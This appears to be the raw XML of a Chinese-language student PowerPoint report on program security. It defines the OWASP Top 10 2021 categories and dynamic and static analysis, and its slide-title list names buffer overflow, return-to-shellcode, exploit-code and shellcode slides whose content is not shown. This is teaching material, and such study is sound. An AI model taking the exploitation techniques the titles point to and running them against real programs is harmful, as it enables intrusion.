              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> 在輸入的字串之中夾帶</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>指令，在設計不良的程式當中忽略了字元檢查，這些夾帶進去的惡意指令就會被資料庫伺服器誤認為是正常的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>指令而執行，因此遭到破壞或是入侵</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Insecure Design(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>不安全設計</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>缺乏或無效的控制設計</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16132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65EC1A-4EB3-4745-9C66-28FFEB9D0A4A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>十大漏洞 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>owasp top 10 2021</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="內容版面配置區 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4341E97E-857F-4F2F-AECE-A62B98C002A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Security Misconfiguration(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>安全設定缺陷</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Vulnerable and Outdated Components(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>危險或過舊的元件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>危險或過舊的元件是指網路中的元件包含了未修補已知漏洞的情況，通常是過時且不受支援的操作系統、應用程式、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>應用程式伺服器、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>API </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>和數據庫管理系統 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(DBMS) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Identification and Authentication Failures(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>認證及驗證機制失效</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>) :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Software and Data Integrity Failures(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>軟體及資料完整性失效</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>缺乏資料完整性驗證過程而使用篡改或損壞的資料做出某些決定的狀況</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Security Logging and Monitoring Failures(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>資安記錄及監控失效</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> 資安記錄及監控失效描述了入侵監控和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>report</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>系統未能捕獲和寫入駭客入侵的跡象，如果沒有足夠的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>report</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>報告，數據洩露可能會在數月或數年內未被發現</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Server-Side Request Forgery(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>伺服端請求偽造</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> 當網頁應用程式正在取得遠端資源，卻未驗證由使用者提供的網址，此時就會發生偽造伺服端請求</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="308008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F85BB-17EB-48C9-B15F-8FCA51C861C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>程式漏洞分析</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文字版面配置區 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28DB18C1-273E-4D60-B2DA-BED1F54971CA}"/>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98081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980CFF-118F-4FCB-9B58-2252B7D55C1F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>動態分析</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="內容版面配置區 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8321A94A-61B0-4566-8C4C-6474A508F6CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>提供程序輸入測試所有可能發生的錯誤，弱點，漏洞等</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>借助</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>偵錯器追蹤程式的執行過程，包含執行中函數的呼叫關係、傳遞的參數變數和傳回值，以及堆疊的分配情況</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>‎不用瞭解應用在系統的內部交互或設計，也不用訪問或查看原始碼，即可檢查正在運行的應用‎</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>模擬駭客攻擊對應用程式進行攻擊，分析應用程式的反應來確認是否容易遭受攻擊，屬於黑盒測試</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="245944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F4DEB4-D3A9-4DFF-95DA-860650726BEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>靜態分析</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="內容版面配置區 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B863D066-BC46-4CFC-AD8A-60CED104A5A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>在無須執行程式的情況下，反組譯</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>反編譯工具逆向分析軟體，以掌握其程式執行的邏輯和功能，進一步找出存在安全缺陷的程式，屬於白盒測試</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="831634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帶狀">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1">
      <a:majorFont>
        <a:latin typeface="微軟正黑體"/>
        <a:ea typeface="微軟正黑體"/>
        <a:cs typeface=""/>
      </a:majorFont>
      <a:minorFont>
        <a:latin typeface="微軟正黑體"/>
        <a:ea typeface="微軟正黑體"/>
        <a:cs typeface=""/>
      </a:minorFont>
    </a:fontScheme>
    <a:fmtScheme name="帶狀">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_36804232_TF89910445.potx" id="{D51AFC88-EF60-496D-9C6F-AE10744E859D}" vid="{A6695148-A923-41B3-86AD-93BFA79596C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4086E001林宗彥 期中平時報告第一版</Template>
  <TotalTime>869</TotalTime>
  <Words>1656</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>寬螢幕</PresentationFormat>
  <Paragraphs>193</Paragraphs>
  <Slides>43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43</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="48" baseType="lpstr">
      <vt:lpstr>微軟正黑體</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Roboto</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>帶狀</vt:lpstr>
      <vt:lpstr>程式安全期末報告</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>程式漏洞</vt:lpstr>
      <vt:lpstr>什麼是程式漏洞</vt:lpstr>
      <vt:lpstr>十大漏洞 : owasp top 10 2021</vt:lpstr>
      <vt:lpstr>十大漏洞 : owasp top 10 2021</vt:lpstr>
      <vt:lpstr>程式漏洞分析</vt:lpstr>
      <vt:lpstr>動態分析</vt:lpstr>
      <vt:lpstr>靜態分析</vt:lpstr>
      <vt:lpstr>PWN</vt:lpstr>
      <vt:lpstr>程式漏洞的嚴重性: PWN</vt:lpstr>
      <vt:lpstr>Buffer Overflow</vt:lpstr>
      <vt:lpstr>什麼是buffer overflow</vt:lpstr>
      <vt:lpstr>題目</vt:lpstr>
      <vt:lpstr>程式行為分析</vt:lpstr>
      <vt:lpstr>使用gdb-peda查看程式</vt:lpstr>
      <vt:lpstr>使用r2 對pass進行逆向分析</vt:lpstr>
      <vt:lpstr>使用s main 查看main函數的組合語言</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>Exploit code</vt:lpstr>
      <vt:lpstr>執行結果</vt:lpstr>
      <vt:lpstr>Return2code</vt:lpstr>
      <vt:lpstr>題目</vt:lpstr>
      <vt:lpstr>程式行為分析</vt:lpstr>
      <vt:lpstr>逆向分析-radare2</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>exploit code</vt:lpstr>
      <vt:lpstr>return2shellcode</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>程式行為</vt:lpstr>
      <vt:lpstr>逆向分析</vt:lpstr>
      <vt:lpstr>static analysis == &gt; radare2</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>尋找程式可執行區段 dynamic analysis == &gt; gdb-peda</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>shell code</vt:lpstr>
      <vt:lpstr>exploit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基因演算法 Excel實作</dc:title>
  <dc:creator>宗彥 林</dc:creator>
  <cp:lastModifiedBy>thoth Aza</cp:lastModifiedBy>
  <cp:revision>211</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-11-15T13:09:21Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-05-17T20:52:55Z</dcterms:modified>
</cp:coreProperties>
</file>